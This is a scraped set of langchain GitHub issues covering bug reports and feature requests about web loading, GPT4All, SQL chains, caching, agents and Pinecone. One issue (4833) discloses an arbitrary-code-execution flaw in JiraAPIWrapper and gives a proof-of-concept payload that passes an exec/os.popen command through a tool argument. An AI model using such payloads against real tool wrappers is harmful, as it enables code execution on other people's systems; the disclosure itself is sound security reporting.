contribution I have read the CONTRIBUTING.MD, and if this request looks valid, I'd be happy to contribute.
Extending Prompt Template Store to Git
https://api.github.com/repos/langchain-ai/langchain/issues/4839/comments
3
2023-05-17T06:15:12Z
2023-08-31T05:34:20Z
https://github.com/langchain-ai/langchain/issues/4839
1,713,198,334
4,839
[ "langchain-ai", "langchain" ]
### Feature request When you request a webpage using a library like requests or aiohttp, you're getting the initial HTML of the page, but any content that's loaded via JavaScript after the page loads will not be included. That's why you might see template tags like (item.price)}} taka instead of the actual values. Those tags are placeholders that get filled in with actual data by JavaScript after the page loads. To handle this, you'll need to use a library that can execute JavaScript. A commonly used one is Selenium, but it's heavier than requests or aiohttp because it requires running an actual web browser. But is there any other option that doesn't need running an actual web browser or can use in long-chain without needing graphical interface like using Headless Browsers tools like ` pyppeteer` (Python wrapper for Puppeteer) anyway please solve the issue and ad feathers like this. thanks in advance. ### Motivation To get dynamic content from a webpage while scraping text from a website or webpage. ### Your contribution For my side, I rewrite the _fetch method in your WebBaseLoader class to use pyppeteer instead of aiohttp. But still **not working** but I think this might little help. here is my code, there I Overwirte the class ``` import pyppeteer import asyncio from langchain.document_loaders import WebBaseLoader as BaseWebBaseLoader class WebBaseLoader(BaseWebBaseLoader): async def _fetch( self, url: str, selector: str = 'body', retries: int = 3, cooldown: int = 2, backoff: float = 1.5 ) -> str: for i in range(retries): try: browser = await pyppeteer.launch() page = await browser.newPage() await page.goto(url) await page.waitForSelector(selector) # waits for a specific element to be loaded await asyncio.sleep(5) # waits for 5 seconds before getting the content content = await page.content() # This gets the full HTML, including any dynamically loaded content await browser.close() return content except Exception as e: if i == retries - 1: raise else: logger.warning( f"Error fetching {url} with attempt " f"{i + 1}/{retries}: {e}. Retrying..." ) await asyncio.sleep(cooldown * backoff ** i) raise ValueError("retry count exceeded") ``` and Install this two lib ``` pip install pyppeteer pyppeteer-install ```
Make an option in WebBaseLoader to handle dynamic content that is loaded via JavaScript.
https://api.github.com/repos/langchain-ai/langchain/issues/4838/comments
3
2023-05-17T06:06:30Z
2023-09-19T16:10:37Z
https://github.com/langchain-ai/langchain/issues/4838
1,713,187,340
4,838
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I was trying to create a pipeline using Langchain and GPT4All (gpt4all-converted.bin). The pipeline ran fine when we tried on a windows system. But now when I am trying to run the same code on a RHEL 8 AWS (p3.8x) instance it is generating gibberish response. This is my code - ``` from langchain import PromptTemplate, LLMChain from langchain.llms import GPT4All from langchain.callbacks.manager import CallbackManager from langchain.callbacks.streaming_stdout import StreamingStdOutCallbackHandler gpt4all_path = 'Models/gpt4all-converted.bin' callback_manager = CallbackManager([StreamingStdOutCallbackHandler()]) llm = GPT4All(model=gpt4all_path, callback_manager=callback_manager, verbose=True, temp=0, n_predict=512, n_ctx=2048) prompt_temp = """ Below is an instruction that describes a task. Write a response that appropriately completes the request. > How many letters are there in the English alphabet? There 26 letters in the English Alphabet > Question: {question} > Reply: """ prompt = PromptTemplate(template=prompt_temp, input_variables=["question"]) llm_chain = LLMChain(prompt=prompt, llm=llm) response = llm_chain.run("write me a story about a lonely computer?") ``` And this is what I am getting - ``` print(response) '\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f#\x05\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f#\x05\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f# thealst\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f' ``` Can anyone help me to understand the problem here? ### Suggestion: _No response_
Issue: GPT4All with Langchain generating \x0f\x0f
https://api.github.com/repos/langchain-ai/langchain/issues/4837/comments
2
2023-05-17T05:59:30Z
2023-09-12T11:15:28Z
https://github.com/langchain-ai/langchain/issues/4837
1,713,178,012
4,837
[ "langchain-ai", "langchain" ]
llama-cpp-python added support for n_gpu_layers Here is the comment confirming it https://github.com/abetlen/llama-cpp-python/issues/207#issuecomment-1550578859
[Feature request] Add support for GPU offloading to Llama.cpp llm
https://api.github.com/repos/langchain-ai/langchain/issues/4836/comments
0
2023-05-17T05:37:28Z
2023-05-17T15:35:22Z
https://github.com/langchain-ai/langchain/issues/4836
1,713,157,876
4,836
[ "langchain-ai", "langchain" ]
### Feature request Wrong outputs of the model will raise some exception. So, it may be better to provide clear feedback to the LLM on the specific issue (i.e. incorrect formatting). This would allow the LLM to do self-adjustments and retry, making it robust. ### Motivation Since when I was using the chain to test my own searching tool, if the result is in other language (not english), the model fail to exactly follow the "thought-action" pattern. ### Your contribution Not yet
Making the chain more robust (self-correct)
https://api.github.com/repos/langchain-ai/langchain/issues/4835/comments
2
2023-05-17T05:35:55Z
2024-04-21T21:16:06Z
https://github.com/langchain-ai/langchain/issues/4835
1,713,156,564
4,835
[ "langchain-ai", "langchain" ]
### System Info LangChain version:0.0.171 windows 10 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. Set the environment variables for jira and openai ```python import os from langchain.utilities.jira import JiraAPIWrapper os.environ["JIRA_API_TOKEN"] = "your jira api token" os.environ["JIRA_USERNAME"] = "your username" os.environ["JIRA_INSTANCE_URL"] = "your url" os.environ["OPENAI_API_KEY"] = "your openai key" ``` 2. Run jira ```python jira = JiraAPIWrapper() output = jira.run('other',"exec(\"import os;print(os.popen('id').read())\")") ``` 3. The `id` command will be executed. Commands can be change to others and attackers can execute arbitrary code. ### Expected behavior The code can be executed without any check.
Arbitrary code execution in JiraAPIWrapper
https://api.github.com/repos/langchain-ai/langchain/issues/4833/comments
5
2023-05-17T04:11:40Z
2024-03-13T16:12:28Z
https://github.com/langchain-ai/langchain/issues/4833
1,713,072,690
4,833
[ "langchain-ai", "langchain" ]
### System Info I encountered an issue when executing a SQL statement that involves joining multiple tables. I am working with a SQL Server database, and the following SQL query is returning an error: SELECT TOP 50000 [StoreNo], [StoreName], [Quantity], [GoodsName], [GoodsNo] FROM [JBStore] JOIN [CKCurrStore] ON [JBStore].[StoreNo] = [CKCurrStore].[StoreNo] JOIN [JBGoods] ON [CKCurrStore].[GoodsNo] = [JBGoods].[GoodsNo] The error seems to arise because the [StoreNo] and [GoodsNo] fields are not prefixed with the table names, which causes the query to fail. Here are my table definitions: table_info = { "CKXSCheck": """ CREATE TABLE CKXSCheck ( "OrderNo" VARCHAR PRIMARY KEY, "OrderDate" DATETIME, "Amount" REAL, "InOutTypeNo" INTEGER, "CKAmount" REAL, PRIMARY KEY ("OrderNo") )""", "CKXSCheckDetail": """ CREATE TABLE CKXSCheckDetail ( "OrderNo" VARCHAR, "SerialNo" INTEGER, "GoodsNo" INTEGER, "Amount" REAL, "Quantity" REAL, "Price" REAL, PRIMARY KEY ("OrderNo", "SerialNo"), FOREIGN KEY ("OrderNo") REFERENCES CKXSCheck("OrderNo"), FOREIGN KEY ("GoodsNo") REFERENCES JBGoods("GoodsNo") )""", "JBGoods": """ CREATE TABLE JBGoods ( "GoodsNo" INTEGER PRIMARY KEY, "GoodsCode" VARCHAR, "GoodsName" VARCHAR, PRIMARY KEY ("GoodsNo") )""", "CKCurrStore": """ CREATE TABLE CKCurrStore ( "StoreNo" VARCHAR, "GoodsNo" VARCHAR, "Quantity" REAL, FOREIGN KEY ("StoreNo") REFERENCES CKXSCheck("JBStore"), FOREIGN KEY ("GoodsNo") REFERENCES JBGoods("GoodsNo") )""", "JBStore": """ CREATE TABLE JBStore ( "StoreNo" VARCHAR PRIMARY KEY, "StoreName" VARCHAR, PRIMARY KEY ("StoreNo") )""", } How can I resolve this issue? ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [x] LLMs/Chat Models - [x] Embedding Models - [x] Prompts / Prompt Templates / Prompt Selectors - [x] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [x] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Send a request to the '/api/query' endpoint ### Expected behavior import os import sqlite3 import pymssql import tkinter as tk import tkinter.ttk as ttk from langchain.agents import create_sql_agent, ZeroShotAgent from langchain.agents.agent_toolkits import SQLDatabaseToolkit from langchain import OpenAI, SQLDatabase, SQLDatabaseChain from langchain.prompts.prompt import PromptTemplate from typing import Dict, Any from langchain import LLMChain from typing import Any, List, Tuple from urllib.parse import quote_plus as urlquote from sqlalchemy import create_engine from sqlalchemy.engine import reflection from sqlalchemy import inspect from sqlalchemy.orm import sessionmaker import pandas as pd from sqlalchemy.sql import text as sql_text from sqlalchemy import Table, MetaData, select from sqlalchemy.sql import text import json import decimal import datetime import time from sql_utils import add_table_prefix_to_columns from flask import Flask, request, render_template,jsonify import re #查询全部商品 #查询销售额前100的所有商品 #查询库存数量明细表 显示仓库序号 仓库名称 数量 商品名称 商品序号 # 替换为你的 API 密钥 # Customized English prompt _DEFAULT_TEMPLATE = """You are an MS SQL expert. Given an input question, first create a syntactically correct MS SQL query to run, then look at the results of the query and return the answer to the input question. Note that you should never perform any operations that could modify the database. This includes UPDATE, DELETE, or INSERT operations. Your job is only to read data and answer questions. Unless the user specifies in the question a specific number of examples to obtain, query for 50000 results using the TOP clause as per MS SQL. You can order the results to return the most informative data in the database. Never query for all columns from a table. You must query only the columns that are needed to answer the question. Wrap each column name in square brackets ([]) to denote them as delimited identifiers. Pay attention to use only the column names you can see in the tables below. Be careful to not query for columns that do not exist. Also, pay attention to which column is in which table. Use the following format: Question: "Question here" SQLQuery: "SQL Query to run" SQLResult: "Result of the SQLQuery" Only use the following tables: {table_info} Question: {input}""" PROMPT = PromptTemplate( input_variables=["input", "table_info"], template=_DEFAULT_TEMPLATE ) custom_table_info_OLD= { "v_CKXSDetail": """CREATE TABLE v_CKXSDetail ( "OrderNo" VARCHAR , -- 单据编号, "OrderDate":DATETime,-- 销售日期 "GoodsCode":VARCHAR,-- 商品编号 "GoodsName":VARCHAR,-- 商品名称 "OrderDate":DATETime,-- 销售日期 "Amount" numeric(18,2), -- 销售金额, "InOutTypeNo" INTEGER, -- 值为2表示退货 "Quantity" INTEGER, -- 销售数量 "CKAmount" REAL-- 成本金额 )"""} custom_table_info = { "CKXSCheck": """CREATE TABLE CKXSCheck ( "OrderNo" VARCHAR PRIMARY KEY, -- 单号,字符型主键 "OrderDate":DATETime,-- 销售日期 "Amount" REAL, -- 整单销售金额,(case InOutTypeNo when 2 then -Amount else Amount end) "InOutTypeNo" INTEGER, -- 值为2表示退货 "CKAmount" REAL,-- 整单成本金额 PRIMARY KEY ("OrderNo"), -- 将 OrderNo 主键 )""", "CKXSCheckDetail": """CREATE TABLE CKXSCheckDetail ( "OrderNo" VARCHAR, -- 单号 ,外键 "SerialNo" INTEGER, -- 序列号 ,主键 "GoodsNo" INTEGER, -- 商品序号,外键 "Amount" REAL, -- 商品销售金额 "Quantity" REAL, -- 商品销售数量 "Price" REAL, -- 销售单价 PRIMARY KEY ("OrderNo", "SerialNo"), -- 将 OrderNo 和 SerialNo 设为联合主键 FOREIGN KEY ("OrderNo") REFERENCES CKXSCheck("OrderNo"), -- OrderNo 是 CKXSCheck 表的外键 FOREIGN KEY ("GoodsNo") REFERENCES JBGoods("GoodsNo") -- GoodsNo 是 JBGoods 表的外键 )""", "JBGoods": """CREATE TABLE JBGoods ( "GoodsNo" INTEGER PRIMARY KEY, -- 商品序号,主键 "GoodsCode" VARCHAR, -- 商品编号 "GoodsName" VARCHAR, -- 商品名称 PRIMARY KEY ("GoodsNo") -- 将 GoodsNo 设为主键 )""", "CKCurrStore": """CREATE TABLE CKCurrStore ( "StoreNo" VARCHAR, -- 仓库序号,外键 "GoodsNo" VARCHAR, -- 商品序号,外键 "Quantity" REAL, -- 库存数量 FOREIGN KEY ("StoreNo") REFERENCES CKXSCheck("JBStore"), -- StoreNo 是 JBStore 表的外键 FOREIGN KEY ("GoodsNo") REFERENCES JBGoods("GoodsNo") -- GoodsNo 是 JBGoods 表的外键 )""", "JBStore": """CREATE TABLE JBStore ( "StoreNo" VARCHAR, -- 仓库序号,主键 "StoreName" VARCHAR, -- 仓库名称 PRIMARY KEY ("StoreNo") -- 将 GoodsNo 设为主键 )""", } db = SQLDatabase.from_uri(f"mssql+pymssql://{user_name}:{urlquote(psw)}@{ip}/{database}", include_tables=['CKXSCheck', 'CKXSCheckDetail', 'JBGoods', 'CKCurrStore', 'JBStore'], custom_table_info=custom_table_info) llm=OpenAI(temperature=0) class CustomSQLQueryChain(SQLDatabaseChain): def _call(self, inputs: Dict[str, Any]) -> Dict[str, Any]: prompt = self.prompt or SQL_PROMPTS.get(self.database.dialect, PROMPT) llm_chain = LLMChain(llm=self.llm, prompt=prompt) input_text = f"{inputs[self.input_key]}\nSQLQuery:" self.callback_manager.on_text(input_text, verbose=self.verbose) table_names_to_use = inputs.get("table_names_to_use") table_info = self.database.get_table_info(table_names=table_names_to_use) llm_inputs = { "input": input_text, "top_k": self.top_k, "dialect": self.database.dialect, "table_info": table_info, "stop": ["\nSQLResult:"], } intermediate_steps = [] sql_cmd = llm_chain.predict(**llm_inputs).strip() # simplified this line intermediate_steps.append({"SQLQuery": sql_cmd}) self.callback_manager.on_text(sql_cmd, color="green", verbose=self.verbose) chain_result: Dict[str, Any] = { "intermediate_steps": intermediate_steps, "result": sql_cmd, } return chain_result custom_db_chain = CustomSQLQueryChain(llm=llm, database=db, prompt=PROMPT, verbose=True, return_intermediate_steps=True) def display_table(tree, columns, data): print(data) print(columns) # 删除所有的列 tree['columns'] = [] # 重新设置列 tree["columns"] = columns tree["show"] = "headings" for col in columns: tree.heading(col, text=col) tree.column(col, width=100) # 删除所有的数据 for i in tree.get_children(): tree.delete(i) # 插入新的数据 for row in data: tree.insert("", "end", values=row) root = tk.Tk() root.title("Chat with your Tabular Data") entry = ttk.Entry(root, font=("Arial", 14)) entry.pack(padx=20, pady=20, fill=tk.X) def get_chinese_col_names(field_names, conn): # 使用 XTSQLField 表查询中文列名 field_names_str = ', '.join(f"'{field_name}'" for field_name in field_names) # 将字段名列表转换为适合SQL查询的字符串 query = f""" WITH numbered_rows AS ( SELECT SqFieldName, (CASE SqFieldName WHEN 'GoodsCode' THEN '商品编号' WHEN 'GoodsName' THEN '商品名称' WHEN 'Quantity' THEN '数量' ELSE CClientName END) as CClientName, ROW_NUMBER() OVER (PARTITION BY SqFieldName ORDER BY CClientName) AS rn FROM XTSQLField WHERE SqFieldName in ({field_names_str}) AND ASCII(LEFT(CClientName, 1)) > 127 -- 添加这个条件以仅选择CClientName为中文的行 ) SELECT SqFieldName, CClientName FROM numbered_rows WHERE rn = 1; """ print(query) result_proxy = conn.execute(query) name_mapping = {row['SqFieldName']: row['CClientName'] for row in result_proxy} # 创建一个字段名到中文名的映射字典 chinese_col_names = [] for field_name in field_names: chinese_name = name_mapping.get(field_name, field_name) # 如果没有找到中文名,就使用原始的字段名 chinese_col_names.append(chinese_name) return chinese_col_names class DecimalEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, decimal.Decimal): return float(obj) return super(DecimalEncoder, self).default(obj) app = Flask(__name__) #分页查询 @app.route('/api/get-messages', methods=['POST']) def get_messages(): # 获取前端传过来的分页参数 page = request.args.get('page', default = 1, type = int) # 连接数据库 engine = create_engine(f"mssql+pymssql://{user_name}:{urlquote(psw)}@{ip}/{database}") metadata = MetaData(bind=engine) # 创建一个表对象,反映AiQuery表 AiQuery = Table('AiQuery', metadata, autoload_with=engine) with engine.connect() as conn: # 查询AiQuery表 pagesize = 4 select_stmt = select(AiQuery).order_by(AiQuery.columns.ID.desc()).limit(pagesize).offset((page - 1) * pagesize) result_proxy = conn.execute(select_stmt) # 将 LegacyRow 对象转换为字典 result_data = [dict(row) for row in result_proxy.fetchall()] # 根据你的需求格式化返回的数据 messages = [] for data in result_data: messages.append({ "text": data['QueryStr'], "time": data['UsedTime'], "records": data['ResultRecords'], "timestamp": data['CreateDate'].strftime("%Y-%m-%d %H:%M"), # 将日期转换为字符串 "id": data['ID'] }) return jsonify(messages) @app.route('/api/query', methods=['POST']) def do_query(): data = request.get_json() query = data.get('query') start_time = time.time() # 记录查询开始的时间 engine = create_engine(f"mssql+pymssql://{user_name}:{urlquote(psw)}@{ip}/{database}") metadata = MetaData(bind=engine) # 创建一个表对象,反映AiQuery表 AiQuery = Table('AiQuery', metadata, autoload_with=engine) inserted_id = None # 用于保存新插入的行的ID with engine.connect() as conn: # 检查AiQuery表中是否已经有该查询 select_stmt = select(AiQuery).where(AiQuery.columns.QueryStr == query) result_proxy = conn.execute(select_stmt) print(select_stmt.compile(compile_kwargs={"literal_binds": True})) # 如果有结果,那么直接返回结果 row = result_proxy.fetchone() print(row) if row: # 从 AiQuery 表中获取SQL查询字符串 sql_query = row.SQLStr # 执行查询字符串,获取结果 result_proxy = conn.execute(sql_query) # 将 LegacyRow 对象转换为字典 result_data = [dict(row) for row in result_proxy.fetchall()] column_names = list(result_proxy.keys()) sorted_result_data = [] for resrow in result_data: sorted_row = [resrow[column_name] for column_name in column_names] sorted_result_data.append(sorted_row) result_data = sorted_result_data column_names = get_chinese_col_names(column_names, conn) inserted_id = row.ID # 获取已经存在的行的ID used_time = round(time.time() - start_time, 2) # 计算查询耗时 refresh_date = datetime.datetime.now() # 获取当前时间 result_records = len(result_data) # 获取结果记录数 isAdd = False # 更新RefreshDate,ResultRecords和UsedTime字段 update_stmt = AiQuery.update(). \ where(AiQuery.columns.ID == inserted_id). \ values(RefreshDate=refresh_date, ResultRecords=result_records, UsedTime=used_time, Result_data=json.dumps(result_data, cls=DecimalEncoder)) conn.execute(update_stmt) else: # 如果没有结果,那么执行GPT查询 result = custom_db_chain(query) sql_query = result['result'] sql_query = add_table_prefix_to_columns(sql_query, custom_table_info) print(sql_query) result_proxy = conn.execute(sql_query) # 将 LegacyRow 对象转换为字典 result_data = [dict(row) for row in result_proxy.fetchall()] column_names = list(result_proxy.keys()) sorted_result_data = [] for resrow in result_data: sorted_row = [resrow[column_name] for column_name in column_names] sorted_result_data.append(sorted_row) result_data = sorted_result_data column_names = get_chinese_col_names(column_names, conn) used_time = round(time.time() - start_time, 2) # 计算查询耗时 result_records = len(result_data) # 获取结果记录数 # 将结果保存到AiQuery表中,包括新的字段 insert_stmt = AiQuery.insert().values(QueryStr=query, SQLStr=sql_query, Column_names=json.dumps(column_names, cls=DecimalEncoder), Result_data=json.dumps(result_data, cls=DecimalEncoder), ResultRecords=result_records, UsedTime=used_time) result = conn.execute(insert_stmt) inserted_id = result.inserted_primary_key[0] # 获取新插入的行的ID isAdd = True return jsonify({'isAdd': isAdd, 'column_names': column_names, 'result_data': result_data, 'inserted_id': inserted_id}) if __name__ == '__main__': app.run(debug=True) tree = ttk.Treeview(root) tree.pack(padx=20, pady=20, fill=tk.X) def on_click(): query = entry.get() result = custom_db_chain(query) sql_query = result['result'] engine = create_engine(f"mssql+pymssql://{user_name}:{urlquote(psw)}@{ip}/{database}") with engine.connect() as conn: result_proxy = conn.execute(sql_query) # 同样,将 LegacyRow 对象转换为字典 result_data = [dict(row) for row in result_proxy.fetchall()] column_names = list(result_proxy.keys()) column_names = get_chinese_col_names(column_names, conn) # 新增:清空 Treeview for item in tree.get_children(): tree.delete(item) # 新增:显示查询结果 display_table(tree, column_names, result_data) # 新增:显示查询结果 # display_table(tree, [header["label"] for header in dataTable["headers"]], dataTable["contents"]) # except Exception as err: # print("Error occurred:", err) button = ttk.Button(root, text="Chat", command=on_click) button.pack(padx=20, pady=20) text = tk.Text(root, height=10, width=60, font=("Arial", 14)) text.pack(padx=20, pady=20) root.mainloop()
Handling Errors in SQL Statements That Involve Multiple Table Joins
https://api.github.com/repos/langchain-ai/langchain/issues/4832/comments
2
2023-05-17T04:01:52Z
2024-02-07T19:07:29Z
https://github.com/langchain-ai/langchain/issues/4832
1,713,063,873
4,832
[ "langchain-ai", "langchain" ]
### System Info Langchain Version: 0.0.170 Platform: Linux X86_64 Python: 3.9 ### Who can help? @SimFG _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Steps to produce behaviour: ```python from gptcache import Cache from gptcache.adapter.api import init_similar_cache from langchain.cache import GPTCache # Avoid multiple caches using the same file, causing different llm model caches to affect each other def init_gptcache(cache_obj: Cache, llm str): init_similar_cache(cache_obj=cache_obj, data_dir=f"similar_cache_{llm}") langchain.llm_cache = GPTCache(init_gptcache) llm = OpenAI(model_name="text-davinci-002", temperature=0.2) llm("tell me a joke") print("cached:", langchain.llm_cache.lookup("tell me a joke", llm_string)) # cached: None ``` the cache won't hits ### Expected behavior the gptcache should have a hit
GPTCache keep creating new gptcache cache_obj
https://api.github.com/repos/langchain-ai/langchain/issues/4830/comments
0
2023-05-17T03:26:37Z
2023-05-18T16:42:38Z
https://github.com/langchain-ai/langchain/issues/4830
1,713,035,478
4,830
[ "langchain-ai", "langchain" ]
### System Info langchain version 0.0.171 python version 3.9.13 macos ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [X] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction This is a problem with the generative agents. To reproduce please follow the tutorial outlines here: https://python.langchain.com/en/latest/use_cases/agent_simulations/characters.html When you get to the following line of code you will get an error: `print(tommie.get_summary(force_refresh=True))` ``` File ~/.pyenv/versions/3.9.13/lib/python3.9/site-packages/langchain/retrievers/time_weighted_retriever.py:14, in _get_hours_passed(time, ref_time) 12 def _get_hours_passed(time: datetime.datetime, ref_time: datetime.datetime) -> float: 13 """Get the hours passed between two datetime objects.""" ---> 14 return (time - ref_time).total_seconds() / 3600 TypeError: unsupported operand type(s) for -: 'datetime.datetime' and 'NoneType' ``` ### Expected behavior The ref time should be a datetime and tommies summary should be printed.
TypeError: unsupported operand type(s) for -: 'datetime.datetime' and 'NoneType'
https://api.github.com/repos/langchain-ai/langchain/issues/4825/comments
7
2023-05-17T02:24:24Z
2023-05-22T22:47:05Z
https://github.com/langchain-ai/langchain/issues/4825
1,712,990,151
4,825
[ "langchain-ai", "langchain" ]
### System Info LangChain 0.0.171, Python 3.10.10 running the code: index = pinecone.Index('ssk') print(index.describe_index_stats()) vectorstore = Pinecone(index=index, embedding_function=OpenAIEmbeddings.embed_query, text_key='text') documents = vectorstore.similarity_search('How can several llama_indexes be composed?') print(index.describe_index_stats()) gives the following {'dimension': 1536, 'index_fullness': 0.0, 'namespaces': {'': {'vector_count': 335}}, 'total_vector_count': 335} but gives an error in the vectorstore.similarity_search call --------------------------------------------------------------------------- TypeError Traceback (most recent call last) Cell In[46], line 4 2 print(index.describe_index_stats()) 3 vectorstore = Pinecone(index=index, embedding_function=OpenAIEmbeddings.embed_query, text_key='text') ----> 4 documents = vectorstore.similarity_search('How can several llama_indexes be composed?') File ~/anaconda3/envs/langchain_play/lib/python3.10/site-packages/langchain/vectorstores/pinecone.py:155, in Pinecone.similarity_search(self, query, k, filter, namespace, **kwargs) 136 def similarity_search( 137 self, 138 query: str, (...) 142 **kwargs: Any, 143 ) -> List[Document]: 144 """Return pinecone documents most similar to query. 145 146 Args: (...) 153 List of Documents most similar to the query and score for each 154 """ --> 155 docs_and_scores = self.similarity_search_with_score( 156 query, k=k, filter=filter, namespace=namespace, **kwargs 157 ) 158 return [doc for doc, _ in docs_and_scores] File ~/anaconda3/envs/langchain_play/lib/python3.10/site-packages/langchain/vectorstores/pinecone.py:115, in Pinecone.similarity_search_with_score(self, query, k, filter, namespace) 113 if namespace is None: 114 namespace = self._namespace --> 115 query_obj = self._embedding_function(query) 116 docs = [] 117 results = self._index.query( 118 [query_obj], 119 top_k=k, (...) 122 filter=filter, 123 ) TypeError: OpenAIEmbeddings.embed_query() missing 1 required positional argument: 'text' ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction run code like: index = pinecone.Index('ssk') print(index.describe_index_stats()) vectorstore = Pinecone(index=index, embedding_function=OpenAIEmbeddings.embed_query, text_key='text') documents = vectorstore.similarity_search('How can several llama_indexes be composed?') ### Expected behavior for a valid pinecone index, expect documents to be populated without error
pinecone.similarity_search -> TypeError: OpenAIEmbeddings.embed_query() missing 1 required positional argument: 'text'
https://api.github.com/repos/langchain-ai/langchain/issues/4821/comments
4
2023-05-17T01:03:52Z
2024-03-23T14:37:37Z
https://github.com/langchain-ai/langchain/issues/4821
1,712,933,277
4,821
[ "langchain-ai", "langchain" ]
